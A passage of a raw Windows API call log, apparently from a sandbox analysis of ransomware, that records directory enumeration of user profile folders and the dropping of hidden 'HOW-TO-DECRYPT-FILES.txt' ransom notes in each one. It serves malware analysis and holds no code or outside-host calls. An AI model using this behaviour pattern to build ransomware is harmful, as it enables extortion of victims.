FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.872] GetLastError () returned 0x0 [0048.872] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.872] GetLastError () returned 0x0 [0048.872] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.872] GetLastError () returned 0x0 [0048.872] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.872] GetLastError () returned 0x0 [0048.872] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.872] GetLastError () returned 0x12 [0048.872] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.873] SetErrorMode (uMode=0x0) returned 0x1 [0048.873] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Searches\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.873] GetLastError () returned 0x12 [0048.873] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.874] GetLastError () returned 0x12 [0048.874] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.874] GetLastError () returned 0x12 [0048.874] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.874] GetLastError () returned 0x12 [0048.874] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.874] GetLastError () returned 0x12 [0048.874] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.874] GetLastError () returned 0x12 [0048.874] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.874] SetErrorMode (uMode=0x0) returned 0x1 [0048.874] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1bbf604 | out: lpFileInformation=0x1bbf604*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c1c570, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c1c570, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27feeae6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x20c)) returned 1 [0048.875] GetLastError () returned 0x12 [0048.875] SetErrorMode (uMode=0x0) returned 0x1 [0048.875] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\searches\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.876] GetLastError () returned 0x0 [0048.876] GetFileType (hFile=0x184) returned 0x1 [0048.876] SetErrorMode (uMode=0x0) returned 0x1 [0048.876] GetFileType (hFile=0x184) returned 0x1 [0048.876] WriteFile (in: hFile=0x184, lpBuffer=0x1bdb2a4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1bdb2a4*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0048.877] GetLastError () returned 0x0 [0048.877] CloseHandle (hObject=0x184) returned 1 [0048.877] GetLastError () returned 0x0 [0048.877] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.877] GetLastError () returned 0x0 [0048.877] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), fInfoLevelId=0x0, lpFileInformation=0x1bdcf20 | out: lpFileInformation=0x1bdcf20*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6c1c570, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c1c570, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27feeae6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xf8)) returned 1 [0048.877] GetLastError () returned 0x0 [0048.877] SetErrorMode (uMode=0x0) returned 0x1 [0048.878] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\searches\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.878] GetLastError () returned 0x5 [0048.879] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), fInfoLevelId=0x0, lpFileInformation=0x1bfac08 | out: lpFileInformation=0x1bfac08*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6c426d0, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c426d0, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27feeae6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xf8)) returned 1 [0048.879] GetLastError () returned 0x5 [0048.879] SetErrorMode (uMode=0x0) returned 0x1 [0048.879] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\searches\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.879] GetLastError () returned 0x5 [0048.880] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\SendTo\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.880] GetLastError () returned 0x5 [0048.881] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Start Menu\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.881] GetLastError () returned 0x5 [0048.882] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Templates\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.882] GetLastError () returned 0x5 [0048.882] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Videos\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.883] GetLastError () returned 0x5 [0048.883] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.883] GetLastError () returned 0x5 [0048.883] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.883] GetLastError () returned 0x5 [0048.883] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.883] GetLastError () returned 0x12 [0048.883] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.883] SetErrorMode (uMode=0x0) returned 0x1 [0048.883] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Videos\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.883] GetLastError () returned 0x12 [0048.883] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.883] GetLastError () returned 0x12 [0048.883] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.883] GetLastError () returned 0x12 [0048.883] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.883] GetLastError () returned 0x12 [0048.883] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.883] SetErrorMode (uMode=0x0) returned 0x1 [0048.883] GetFileAttributesExW (in: lpFileName="C:\\Users\\Default\\Videos\\desktop.ini" (normalized: "c:\\users\\default\\videos\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1c1c354 | out: lpFileInformation=0x1c1c354*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c1c570, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c1c570, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27c5c9df, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0048.884] GetLastError () returned 0x12 [0048.884] SetErrorMode (uMode=0x0) returned 0x1 [0048.884] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\videos\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.884] GetLastError () returned 0x0 [0048.884] GetFileType (hFile=0x184) returned 0x1 [0048.884] SetErrorMode (uMode=0x0) returned 0x1 [0048.884] GetFileType (hFile=0x184) returned 0x1 [0048.884] WriteFile (in: hFile=0x184, lpBuffer=0x1c37ef0*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1c37ef0*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0048.885] GetLastError () returned 0x0 [0048.885] CloseHandle (hObject=0x184) returned 1 [0048.885] GetLastError () returned 0x0 [0048.885] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Videos\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.886] GetLastError () returned 0x0 [0048.886] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0048.886] GetLastError () returned 0x5 [0048.887] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.887] GetLastError () returned 0x5 [0048.887] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.887] GetLastError () returned 0x5 [0048.887] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.887] GetLastError () returned 0x5 [0048.887] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.887] GetLastError () returned 0x5 [0048.887] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.887] GetLastError () returned 0x5 [0048.887] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.887] GetLastError () returned 0x5 [0048.887] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.887] GetLastError () returned 0x5 [0048.887] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.887] GetLastError () returned 0x5 [0048.887] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.887] GetLastError () returned 0x5 [0048.887] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.887] GetLastError () returned 0x5 [0048.887] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.887] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.888] GetLastError () returned 0x5 [0048.888] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.888] GetLastError () returned 0x12 [0048.888] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.888] SetErrorMode (uMode=0x0) returned 0x1 [0048.888] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.889] GetLastError () returned 0x12 [0048.889] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.890] GetLastError () returned 0x12 [0048.890] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.890] GetLastError () returned 0x12 [0048.890] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.890] GetLastError () returned 0x12 [0048.890] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.890] GetLastError () returned 0x12 [0048.890] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.890] GetLastError () returned 0x12 [0048.890] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.890] GetLastError () returned 0x12 [0048.890] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.890] SetErrorMode (uMode=0x0) returned 0x1 [0048.890] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\NTUSER.DAT" (normalized: "c:\\users\\eebsym5\\ntuser.dat"), fInfoLevelId=0x0, lpFileInformation=0x1c3d96c | out: lpFileInformation=0x1c3d96c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x8e4c770, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0xb28e4740, ftLastAccessTime.dwHighDateTime=0x1d35a62, ftLastWriteTime.dwLowDateTime=0xb28e4740, ftLastWriteTime.dwHighDateTime=0x1d35a62, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0048.890] GetLastError () returned 0x12 [0048.890] SetErrorMode (uMode=0x0) returned 0x1 [0048.890] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\NTUSER.DAT" (normalized: "c:\\users\\eebsym5\\ntuser.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.890] GetLastError () returned 0x20 [0048.891] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.891] GetLastError () returned 0x0 [0048.891] GetFileType (hFile=0x184) returned 0x1 [0048.891] SetErrorMode (uMode=0x0) returned 0x1 [0048.891] GetFileType (hFile=0x184) returned 0x1 [0048.891] WriteFile (in: hFile=0x184, lpBuffer=0x1c5a6b8*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1c5a6b8*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0048.892] GetLastError () returned 0x0 [0048.892] CloseHandle (hObject=0x184) returned 1 [0048.892] GetLastError () returned 0x0 [0048.892] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.892] GetLastError () returned 0x0 [0048.892] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\ntuser.dat.LOG1" (normalized: "c:\\users\\eebsym5\\ntuser.dat.log1"), fInfoLevelId=0x0, lpFileInformation=0x1c5c30c | out: lpFileInformation=0x1c5c30c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x90fa030, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x90fa030, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xb26f5560, ftLastWriteTime.dwHighDateTime=0x1d35a62, nFileSizeHigh=0x0, nFileSizeLow=0x40000)) returned 1 [0048.893] GetLastError () returned 0x0 [0048.893] SetErrorMode (uMode=0x0) returned 0x1 [0048.893] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.893] GetLastError () returned 0x5 [0048.894] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\ntuser.dat.LOG2" (normalized: "c:\\users\\eebsym5\\ntuser.dat.log2"), fInfoLevelId=0x0, lpFileInformation=0x1c79e84 | out: lpFileInformation=0x1c79e84*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9120190, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x9120190, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x9120190, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0048.894] GetLastError () returned 0x5 [0048.894] SetErrorMode (uMode=0x0) returned 0x1 [0048.894] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.894] GetLastError () returned 0x5 [0048.895] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf" (normalized: "c:\\users\\eebsym5\\ntuser.dat{6cced2f1-6e01-11de-8bed-001e0bcd1824}.tm.blf"), fInfoLevelId=0x0, lpFileInformation=0x1c97c70 | out: lpFileInformation=0x1c97c70*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9120190, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x9120190, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x27f942d0, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0048.895] GetLastError () returned 0x5 [0048.895] SetErrorMode (uMode=0x0) returned 0x1 [0048.895] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.895] GetLastError () returned 0x5 [0048.896] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\eebsym5\\ntuser.dat{6cced2f1-6e01-11de-8bed-001e0bcd1824}.tmcontainer00000000000000000001.regtrans-ms"), fInfoLevelId=0x0, lpFileInformation=0x1cb5b60 | out: lpFileInformation=0x1cb5b60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9120190, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x9120190, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x27f6e170, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0048.896] GetLastError () returned 0x5 [0048.896] SetErrorMode (uMode=0x0) returned 0x1 [0048.896] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.896] GetLastError () returned 0x5 [0048.897] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\eebsym5\\ntuser.dat{6cced2f1-6e01-11de-8bed-001e0bcd1824}.tmcontainer00000000000000000002.regtrans-ms"), fInfoLevelId=0x0, lpFileInformation=0x1cd3b50 | out: lpFileInformation=0x1cd3b50*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9120190, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x9120190, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x27f942d0, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0048.897] GetLastError () returned 0x5 [0048.897] SetErrorMode (uMode=0x0) 